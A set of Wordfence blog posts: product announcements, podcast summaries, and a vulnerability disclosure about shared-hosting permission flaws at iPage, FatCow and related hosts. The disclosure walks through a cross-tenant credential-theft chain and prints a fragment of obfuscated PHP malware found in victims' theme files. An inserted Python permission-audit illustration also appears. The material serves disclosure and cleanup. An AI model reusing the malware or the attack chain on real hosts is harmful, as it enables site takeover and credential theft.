Major Central Release: Alerts, Security Events and Slack Integration

In February we launched Wordfence Central, an efficient way to manage the security of many WordPress sites in one place. If you have multiple sites and haven’t checked it out yet, you should. It includes a powerful dashboard, a single interface to view and manage security findings across all of your sites and robust new tools that make managing Wordfence configuration for your websites a breeze.

Wordfence Central has been incredibly popular. Tens of thousands of sites have been added so far and more are added every day.

Today we are announcing the first major feature release for Central since its launch in February. This represents a big step forward not only for Central, but for Wordfence as a whole. The first major improvement is the addition of a brand new Central alerts feature. You can now configure Central to take over security alerting for your sites, and leverage severity level configuration and a new daily digest feature. Alerts can be sent via any combination of Email, SMS and Slack. We’ve also added a new Security Events tab to Central along with the ability to alert you when the higher priority events occur.

Improving the Signal to Noise Ratio

Alerts sent from Wordfence in the default configuration do a great job of letting you know when you have issues and reminding you important updates are needed. But if you manage a lot of sites, the volume of alerts sent can be overwhelming. We hear from customers about this frequently. The new Central alerts feature gives you everything you need to solve that problem by alerting you to things that need immediate attention and letting you deal with the lower priority information when your schedule allows.

New Severity Classification

Alerts are now categorized by severity: Critical, High, Medium and Low. You are able to choose how you want to be notified about events based on what severity level they have been assigned. You can even choose to turn off alert notifications altogether.

SMS Alerts and Slack Integration

When an important security event occurs you want to know about it right away. Emails can get lost in your inbox, even when they’re important. With that in mind we added SMS as a delivery option. For most, text messages do a great job of getting your attention when it really matters.

We’ve spoken to many organizations who, like us, use Slack for team collaboration. Wordfence Central can now send highly detailed information to Slack for your team to act upon.

Here’s an example of a Security Event alert delivered via Slack:

Daily Digest

We’ve also added an optional daily digest, which provides a high level summary of the activity for all of the sites connected to your Central account for the previous day. This is a great way to stay on top of lower priority events and findings without receiving individual alerts for all of them.

Here’s an example of a Daily Digest message delivered via Slack:

We expect a common approach will be to enable the daily digest and disable alerts for low and potentially medium severity findings and events.

Security Events

We’ve enabled a number of new security events that are now viewable via a new “Events” tab in Central. They are:

  • When Wordfence is automatically updated. *
  • When Wordfence is deactivated. *
  • When the Wordfence firewall is deactivated.
  • When an IP address is blocked.
  • When someone is locked out from login.
  • When someone with administrator access signs in. *
  • When that administrator signs in from a new device or location. *
  • When a non-admin signs in.
  • When a non-admin signs in from a new device or location.
  • When someone is blocked from logging in for using a password found in a breach. *
  • When there’s a large increase in attacks on your site. *
  • When a Wordfence scan stops without completing.

You can also configure alerts to be sent via email, SMS or Slack for events followed by a * in the list above.

Here is what the new events tab looks like:

Getting Started

All of these new features are currently available on Wordfence Central. In Central you will see a new gear icon in the upper right corner that will take you to where you can configure Central alerts. Once you’ve enabled alerts from Central, make sure to disable them for your individual sites. Simply select “No” for the “Send alerts from individual sites?” option.

You will need to upgrade to Wordfence 7.3.4 (or greater) for security alerts to begin flowing into the new events tab. There are no configuration changes necessary for events to start flowing to Central once you’ve upgraded to 7.3.4.

We’re very excited about these new features and would love to hear any feedback you have in the comments. As always our team is available to help out with support questions on the WordPress.org forums for free users and here on our website for Premium customers.

The post Major Central Release: Alerts, Security Events and Slack Integration appeared first on Wordfence.

Podcast Episode 22: Ninja Forms Developer James Laws on Building & Expanding a WordPress Business

Ninja Forms is used on over 1 million WordPress sites. In this episode, Mark interviews James Laws, the co-founder of WP Ninjas, the developers behind this robust and powerful form builder. James and Mark talk about revenue models that work, how to find new opportunities through market research, experimentation with new products and services as well as learning from your customers. They also discuss how to choose your next project when you have too many ideas, and the new businesses James and WP Ninjas are exploring in eCommerce. It’s a fascinating discussion that will help you think about your own businesses and career in new ways. Enjoy!

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find James on Twitter @jameslaws or at JamesLaws.com. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

The post Podcast Episode 22: Ninja Forms Developer James Laws on Building & Expanding a WordPress Business appeared first on Wordfence.

Podcast Episode 21: New Plugin Vulns Exploited in the Wild, an Extortion Scam and the CBP Data Breach

This week, we discuss active exploitation of a plugin vulnerability in the wild, an extortion scam hitting numerous website owners, exposure of Industrial Control Systems to attackers as well as a CBP breach affecting travelers in the United States. We also talk about an email server vulnerability and what to do in a SIM port attack.

Here are approximate timestamps in case you want to jump around:
0:35 User Submitted Posts Plugin Vulnerability Seeing Attacks
4:20 An extortion scam is threatening website owners & how to protect your site
10:10 CBP breach of license plates and facial recognition data affecting US travelers
16:54 WordPress accessibility proposal
25:25 Google Cloud outage affects numerous services
26:59 State of Industrial Control Systems in Poland and Switzerland
36:00 Severe RCE in Exim mail transfer agent
37:09 What to do when SIM swapping happens to you

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant. Please feel free to post your feedback in the comments below.

The post Podcast Episode 21: New Plugin Vulns Exploited in the Wild, an Extortion Scam and the CBP Data Breach appeared first on Wordfence.

Podcast Episode 20: Making Big Changes by Adopting Micro-Habits with Nathan Ingram

At WordCamp Orange County, Nathan Ingram participated in a unique business track discussion about failure, something with which most entrepreneurs are intimately familiar. Immediately after his talk, Nathan sat down with Mark for this interview. The conversation goes deep fast, as both Mark and Nathan share their thoughts about being an entrepreneur and how “the best lessons in life are learned from failure.” Nathan recently lost 50 pounds in two months and he talks about the micro-habits that he leveraged to make big successful changes with his health. This unique, honest and heartfelt interview has a number of lessons for those of us looking to optimize our business processes and find better balance in life.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Nathan on Twitter @nathaningram or at NathanIngram.com where you can also learn more about Nathan’s incredible health journey. You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

The post Podcast Episode 20: Making Big Changes by Adopting Micro-Habits with Nathan Ingram appeared first on Wordfence.

Podcast Episode 19: Service Vulnerabilities in Four Hosting Companies

In episode 19 we talk to Brad Haas about recently patched service vulnerabilities that impacted four popular hosting companies. We also talk about a new login security plugin for WordPress that we’ve launched. In the news we cover a wave of SIM swapping attacks hitting cryptocurrency users, NGINX vulnerabilities and recent data breaches affecting the personal information of millions of people.

Here are approximate timestamps in case you want to jump around:
0:40 Interview with Brad Haas on service vulnerability impacting four popular hosting companies
15:31 New Wordfence Login Security plugin
27:54 SIM port attacks hit cryptocurrency users
35:23 100,000 Australians’ private details exposed by Westpac PayID
39:44 Billing details for 11.9 million Quest Diagnostics customers exposed
43:47 NGINX RCE Vulnerabilities

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find Mark on Twitter as @mmaunder, Kathy as @kathyzant and Brad at @realbradhaas. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 19: Service Vulnerabilities in Four Hosting Companies appeared first on Wordfence.

Service Vulnerability: Four Popular Hosting Companies Fix NFS Permissions and Information Disclosure Problems

Last year, we published two disclosures of service vulnerabilities on hosting platforms. The first one included a trio of brands: Hostway, Momentous, and Paragon Group. The second was for MelbourneIT. In all cases, we were happy to report that the affected companies took our disclosures seriously and moved quickly to fix the problems.

Today we’re announcing a similar disclosure for several brands owned by Endurance International Group, including iPage, FatCow, PowWeb, and NetFirms. A pair of vulnerabilities on these platforms allowed attackers to tamper with customers’ databases directly, without actually accessing their websites. Following our Vulnerability Disclosure Policy, we privately disclosed these problems to the Endurance team. Their response was immediate and exemplary: they communicated with us in order to understand the problems, activated their incident response team to conduct triage, implemented hotfixes within days, and implemented full fixes soon after. Their actions showed solid commitment to their customers’ security.

Attacks and Investigation

Our Security Services Team noticed a recent trend in customers whose sites were hosted on the affected platforms. An administrator account suddenly appeared in the sites, and attackers logged into that account and added malware to the sites using the WordPress theme editor. The account had the same unusual username (“badminton”) in each case. The malware was obfuscated, but performed the same function on each affected site, hijacking site traffic from search engines and redirecting visitors to spam sites.

The platforms do make site access logs available to site owners, but the logs didn’t show any unusual activity on the days of the attacks. We found no malware other than what the attackers added in the theme files, no vulnerable themes or plugins, and generally nothing in common across all the affected sites except that they were on the same set of hosting services.

As in the service vulnerabilities we published last year, it appeared that the attackers had a way to steal database credentials for our customers’ sites, and then interact with the database directly in order to create their rogue administrator accounts. We started to investigate whether that would be possible on the platforms in question, and eventually we discovered two vulnerabilities which allowed it to happen.

The balance of this article is most appropriate for a technical audience. If you are a less technical reader you may want to skip down to the “What You Need To Do” section below.

File and Directory Information Exposure Vulnerability

After compromising a site, it is common for attackers to explore filesystems on the server in order to search for other vulnerabilities. On the affected servers, we discovered that the /opt/users directory contained subdirectories revealing the names of the user accounts for every website on the platform.

For example, a website “example.com” on FatCow might run under the username moo.examplecom. There would be a corresponding directory for it at /opt/users/moo/e/x/moo.examplecom. Permissions on the /opt directory were lax enough that all the subdirectories could be listed by any user. So with a bit of scripting, it was possible to harvest the usernames for every website using FatCow shared hosting (and likewise the other affected brands). After our disclosure, permissions were fixed on /opt/users so that the contents can no longer be listed.

Insufficient Permissions Vulnerability

Four conditions existed that contributed to this vulnerability:

  1. Customer files are all stored on a shared file system.
  2. The full path to a user’s web root directory was public or could be guessed.
  3. All directories in the path to a customer’s site root directory were either world-traversable (the execute bit for ‘all users’ is 1) or group-traversable (the execute bit for ‘group’ is 1), and the sensitive files were world-readable (the read bit for ‘all users’ is 1) or group-readable (the read bit for ‘group’ is 1).
  4. An attacker could cause a program running in the group www to read files in arbitrary locations.

On the affected hosting platforms, all users’ files reside under a shared file system mounted at the directory /hermes. This satisfies the first condition of the Insufficient Permissions vulnerability.

The names of subdirectories in the full path to a site root directory follow a pattern. The full path for our fictional site example.com might be: /hermes/walnaweb15a/b1234/moo.examplecom/.

Ownership and permissions on the file system follow a specific structure for each of the directories in the full path:

/hermes – root:root 0755 – since it is world-readable, its contents can be listed

/hermes/walnaweb15a – root:root 0711 – contents cannot be listed except by root, but can be guessed

/hermes/walnaweb15a/b1234 – root:root 0711 – contents cannot be listed except by root, but can be guessed

/hermes/walnaweb15a/b1234/moo.examplecom – moo.examplecom:www 0750 – contents can be listed by the owner or by any user belonging to the group “www”

The contents of directories like /hermes/walnaweb15a appear to follow a simple pattern – the letter “b” followed by one or more digits. Attackers would have noticed this by viewing the working directory of compromised sites, or even by searching Google for “/hermes/walnaweb” or similar directory names to view accidental full path disclosures. A script can easily find every subdirectory by checking for the existence of /hermes/walnaweb15a/b1, /hermes/walnaweb15a/b2, etc.

It is trickier but still possible to find the contents of the b* directories – this is where the File and Directory Information Exposure vulnerability would be used. Attackers could use scripting to iterate over each username and check for its existence in each b* directory. It’s inefficient, but the attacker could gradually build a large list of full paths to site root directories, satisfying the second condition of the Insufficient Permissions vulnerability.

As outlined above, the default permissions on directories and files on the affected platforms ensure that a program running in the group www can traverse into any user’s directory and read files in it, satisfying the third condition.

PHP scripts in any given user’s site run as that user and as the group cgiuser. As such, they don’t have permission to access other users’ files. However, the File Manager in the hosting control panel runs in the group www. Its operations seem to be restricted to a user’s own site root directory, but it can be manipulated to copy files from any location in the entire file system. So if an attacker crafts requests that point it to other users’ sensitive files, it will have sufficient privileges to copy those files into a directory under the attacker’s control.

After our disclosure, the flaws in the File Manager were patched, and the platform administrators made architectural adjustments to address the permissions problems at a deeper level.
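As an added illustration (not the article’s or the hosting provider’s code), the following Python models the permission chain this section describes and checks the third condition for a given process, then applies the chmod 0600 workaround that the Remediation section describes. The wp-config.php entry, its 0644 mode, and the “moo.othersite” and “panel” account names are assumptions; the directory ownership and modes are the ones given above.

```python
"""Audit a POSIX permission chain against the shared-hosting layout described above."""
import stat
from dataclasses import dataclass, replace
from typing import Dict, List, Tuple

READ, EXEC = 4, 1  # bit values within one rwx triplet


@dataclass(frozen=True)
class Entry:
    """Ownership and permission bits of one path component."""
    owner: str
    group: str
    mode: int  # permission bits only, e.g. 0o750


@dataclass(frozen=True)
class Subject:
    """The accessing process: its user and the groups it runs in."""
    user: str
    groups: Tuple[str, ...]


def permitted(entry: Entry, subject: Subject, bit: int) -> bool:
    """POSIX class rule: owner bits if the user owns the entry, else group bits
    if the process is in the entry's group, else the 'other' bits. Exactly one
    class applies, which is why a 0750 directory stops every non-member."""
    if subject.user == "root":
        return True
    if subject.user == entry.owner:
        shift = 6
    elif entry.group in subject.groups:
        shift = 3
    else:
        shift = 0
    return bool((entry.mode >> shift) & bit)


def audit_path(fs: Dict[str, Entry], target: str, subject: Subject) -> Tuple[bool, List[str]]:
    """Condition 3 from the article: every directory on the way to target must be
    traversable (x) by the subject and the file itself readable (r).
    Returns (file reachable, per-component report)."""
    parts = [p for p in target.split("/") if p]
    report: List[str] = []
    current = ""
    for part in parts[:-1]:
        current += "/" + part
        entry = fs[current]
        ok = permitted(entry, subject, EXEC)
        report.append(f"{current:<48} {entry.owner}:{entry.group} {entry.mode:04o} traverse={'yes' if ok else 'NO'}")
        if not ok:
            return False, report
    entry = fs[target]
    ok = permitted(entry, subject, READ)
    report.append(f"{target:<48} {entry.owner}:{entry.group} {entry.mode:04o} read={'yes' if ok else 'NO'}")
    return ok, report


def hardened(fs: Dict[str, Entry], target: str, mode: int = 0o600) -> Dict[str, Entry]:
    """Copy of the model with the site-owner workaround (chmod 0600 on the file) applied."""
    out = dict(fs)
    out[target] = replace(fs[target], mode=mode)
    return out


def load_from_filesystem(target: str) -> Dict[str, Entry]:
    """Build the same model from a live path with os.stat so audit_path can be run
    on a real host (Unix only: needs pwd/grp to map ids to names)."""
    import os, pwd, grp
    fs: Dict[str, Entry] = {}
    current = ""
    for part in [p for p in target.split("/") if p]:
        current += "/" + part
        st = os.stat(current)
        try:
            owner, group = pwd.getpwuid(st.st_uid).pw_name, grp.getgrgid(st.st_gid).gr_name
        except KeyError:  # id with no local account entry
            owner, group = str(st.st_uid), str(st.st_gid)
        fs[current] = Entry(owner, group, stat.S_IMODE(st.st_mode))
    return fs


# Constructed model of the layout the article gives for the fictional site.
# The wp-config.php entry and its 0644 mode are assumed, not taken from the article.
SITE_ROOT = "/hermes/walnaweb15a/b1234/moo.examplecom"
TARGET = SITE_ROOT + "/wp-config.php"
SAMPLE_FS: Dict[str, Entry] = {
    "/hermes": Entry("root", "root", 0o755),
    "/hermes/walnaweb15a": Entry("root", "root", 0o711),
    "/hermes/walnaweb15a/b1234": Entry("root", "root", 0o711),
    SITE_ROOT: Entry("moo.examplecom", "www", 0o750),
    TARGET: Entry("moo.examplecom", "www", 0o644),
}
SITE_OWNER = Subject("moo.examplecom", ("cgiuser",))      # the site's own PHP, per the article
OTHER_CUSTOMER = Subject("moo.othersite", ("cgiuser",))   # another tenant's PHP; name assumed
FILE_MANAGER = Subject("panel", ("www",))                 # control-panel process in group www; name assumed

if __name__ == "__main__":
    for label, subj, fs in [("other tenant's PHP", OTHER_CUSTOMER, SAMPLE_FS),
                            ("File Manager (group www)", FILE_MANAGER, SAMPLE_FS),
                            ("File Manager after chmod 0600", FILE_MANAGER, hardened(SAMPLE_FS, TARGET))]:
        ok, lines = audit_path(fs, TARGET, subj)
        print(f"== {label}: {'EXPOSED' if ok else 'blocked'}")
        print("\n".join(lines))
```

The report shows the other tenant stopped at the 0750 site directory, the group-www process reading the file, and the 0600 workaround closing that path while the owner keeps access.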

Remediation

Before the vulnerabilities were fixed, the only workaround for site owners was to set permissions on any sensitive file to 0600. This was not ideal, as there are a number of ways the permissions could be reset as a side effect of scripts running on the website or server. Thankfully, the Endurance team worked very quickly to fix the problems. Our disclosure was on May 7. They replied after hours acknowledging the report, and worked with us during the following two weeks. Their hotfixes were in place by May 10, and permanent fixes finished by May 15.

What You Need To Do

If you use shared hosting on any of the brands we mentioned, use Wordfence to check your site for issues. If your site was exploited before the fixes, the attackers may have added malware which could still be present. Our customers had obfuscated code added at the top of the active theme’s header.php file, similar to this:

<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["dd\x70\x68z\x67\x64gx"]="sl\x77k\x77i";${"\x47\x4cO\x42\x41L\x53"}["c\x7a\x66\x6dubkdo\x6a\x78"]="\x6c\x6f\x63\x61t\x69\x6fn";${"\x47\x4c\x4fB\x41LS"}["\x67\x64\x64e\x74\x62p\x75f\x65i"]="\x68t\x6d\x6c";${"\x47\x4cOB\x41\x4cS"}["\x77i\x64\x68\x6bv\x6da"]="\x73t\x72\x66";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x66s\x75\x71\x79\x6evw"]="b\x6f\x74";${"\x47\x4cOBAL\x53"}["w\x6c\x79\x63\x61\x76\x62\x71\x68\x6f\x6c\x75"]="cac\x68\x65";${"G\x4cO\x42\x41L\x53"}["ry\x68\x72ku\x6b"]="\x73\x63h\x65\x6d\x65";${"\x47\x4c\x4f\x42\x41L\x53"}["\x74\x6a\x6bc\x64e\x65\x69w"]="\x73l\x77k\x77i\x32";${"G\x4cOBA\x4cS"}["\x79\x65\x64\x73\x67\x6ah\x69\x73\x67"]="\x73\x6c\x74l\x65\x69l\x73";

You should also check your list of user accounts and look for any rogue administrators. If your site has any of these issues, we recommend using our site cleaning service to fix them.

Conclusion

With the popularity of WordPress today, the security of the WordPress community at large is critically important. We are pleased to see that our approach to handling service vulnerabilities is working to support that need, and bringing about an improved overall security posture for the community.

Our Security Services Team continues to analyze hundreds of hacked websites each month, so we expect to find more of these in the future. We will continue to provide updates here on the blog.

Finally, a huge thank you to Matt Barry and Sean Murphy from our team for helping with the vulnerability research.

The post Service Vulnerability: Four Popular Hosting Companies Fix NFS Permissions and Information Disclosure Problems appeared first on Wordfence.

Introducing the Wordfence Login Security Plugin

Today we are excited to announce the release of a brand new plugin: Wordfence Login Security. It is completely standalone, so you don’t need to install the full version of Wordfence to take advantage of the specific security features included in it.

Wordfence Login Security is designed by our team to secure your login and authentication system. It’s worth noting that this plugin does not include the firewall, malware scanner and other features that the full Wordfence plugin comes with.

If you already have an alternative firewall solution in place and are covered for malware scanning, then this plugin is perfect for you because it secures your login system against several dangerous and targeted attacks.

Wordfence Login Security includes the following features:

  • It provides robust two-factor authentication that is not vulnerable to cellphone SIM porting attacks.
  • It includes a login page CAPTCHA that protects you from sophisticated credential stuffing attacks that use a wide range of IP addresses.
  • It also includes XML-RPC protection.

These features are also included in the full Wordfence plugin. So if you are using Wordfence already, you don’t need to install this new plugin. You can learn more about how these features are available in Wordfence by checking out last week’s announcement post.

Why did we do this?

Over the last year we have spent a lot of time talking to WordPress users. One thing we learned, from larger companies especially, is that everyone’s situation is different. And that even means (gasp!) that some people can’t or don’t run Wordfence on some of their sites. The reasons vary, but in most cases there are many features they could benefit from using.

With that in mind, when we decided to completely rewrite our two-factor authentication feature we decided to also release it as a separate plugin. Our hope is that by making sets of related features available in “modular” plugins like this, more websites will benefit from Wordfence protection. Our goal, after all, is to make the web safer. The more sites we can keep safe the better.

Do I need both plugins?

In a word, no. Wordfence Login Security and the full Wordfence plugin share the same code for these features. If you already have the full Wordfence plugin installed you already have all of the features available in Wordfence Login Security. If you try to install Wordfence Login Security, nothing will change.

Can I install the full Wordfence plugin if I have Wordfence Login Security installed?

Wordfence Login Security and Wordfence are built to play nicely together. They integrate seamlessly. If you are using Wordfence Login Security and then install the full version of Wordfence, all of your settings are preserved.

Once you install the full version of Wordfence, a new ‘Wordfence’ section will be added to your menu. The settings for Wordfence Login Security will appear in this area as one of the security features available to you.

Again, all your settings are preserved and you can continue knowing your site has the additional features that Wordfence includes like our firewall and malware scanner.

Do I need to upgrade to Premium to use Wordfence Login Security?

This plugin is free and you do not need to pay to use it. In addition, the features that are included in Wordfence Login Security are also available in the free version of the full Wordfence plugin.

The Wordfence team is committed to making the Web a safer place. We wanted to make these essential security features available to absolutely every WordPress site owner and user at no cost. We also built the plugin to be as widely compatible as possible so that there is no barrier to entry when it comes to securing your website against credential stuffing attacks and other attacks targeting your login system.

What’s next for Wordfence Login Security?

Our team spent the past year developing and testing Wordfence Login Security. Our team has taken the plugin through a rigorous QA process that ensures it is widely compatible, rock solid and ready for production. We have also performed a comprehensive security audit on it to ensure that there are no loopholes or issues that an attacker can exploit.

At this point, Wordfence Login Security is an extremely stable and robust security solution for your WordPress authentication system. Our intention is to set the standard for WordPress two-factor authentication with this product.

Our next steps are to listen to the community feedback while providing excellent support for our customers. This will help guide the product direction and our development team.

If you are not currently using the full version of Wordfence, we hope you will at the very least install Wordfence Login Security to protect your WordPress authentication system. Our team is installing this plugin on their own sites – in fact many have been running the beta version for months.

Wordfence Login Security is a huge step forward in helping secure WordPress and we hope you will help spread the word in the community that this plugin is available, completely free, and does an excellent job of improving the security posture of a WordPress website.

Regards,

Mark Maunder
Wordfence/Defiant Founder and CEO

The post Introducing the Wordfence Login Security Plugin appeared first on Wordfence.

Episode 18: Scaling a WordPress Agency with Entrepreneur Verious Smith

At WordCamp Orange County, Mark interviewed Verious Smith from Philoveracity Design, a digital agency in southern California. Verious has also been the lead organizer of WordCamp Riverside and runs WordPress meetups to give back to the community. Mark and Verious talk about the challenges of entrepreneurship, growing from freelancer to an agency, and trust and interdependence in remote work. Verious is always striving to learn new things to optimize performance and improve workflow. We hope you enjoy the interview and get as much inspiration from Verious as we did.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Verious on Twitter @verioussmith or at Philoveracity Design.

The post Episode 18: Scaling a WordPress Agency with Entrepreneur Verious Smith appeared first on Wordfence.

Podcast Episode 17: 3 Severe WordPress Plugin Vulnerabilities

Mikey Veenstra joins us to talk about three WordPress plugins with severe vulnerabilities affecting well over 150,000 WordPress installations. Two plugins have been patched, one has not. With Mark under deadline for a film project, Mikey also talks some security news with Kathy. We cover a Docker vulnerability, anatomy of a SIM port attack, zero-day Windows exploits released by a disgruntled security researcher, two large scale data leaks affecting millions of people, and revisit the Baltimore ransomware problem and how the NSA’s Eternal Blue tool was used in the attack.

Here are approximate timestamps in case you want to jump around:
1:00 Interview with Mikey Veenstra on 3 severe WordPress plugin vulnerabilities
13:00 The news, and where’s Mark?
13:30 Docker vulnerability not yet patched
16:24 Anatomy of a SIM port attack
20:17 Microsoft zero-day exploits on Github
25:34 XSS vulnerability discovered in Slimstat plugin
26:26 Over 49 million Instagram users’ data exposed
29:28 First American Financial leaked hundreds of millions of title insurance records
34:20 How an NSA malware tool was used in the Baltimore ransomware attack

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

This week in the news we cover:

You can find Mark on Twitter as @mmaunder, Kathy as @kathyzant and Mikey at @heyitsmikeyv. Please don’t hesitate to post your feedback in the comments below.

The post Podcast Episode 17: 3 Severe WordPress Plugin Vulnerabilities appeared first on Wordfence.
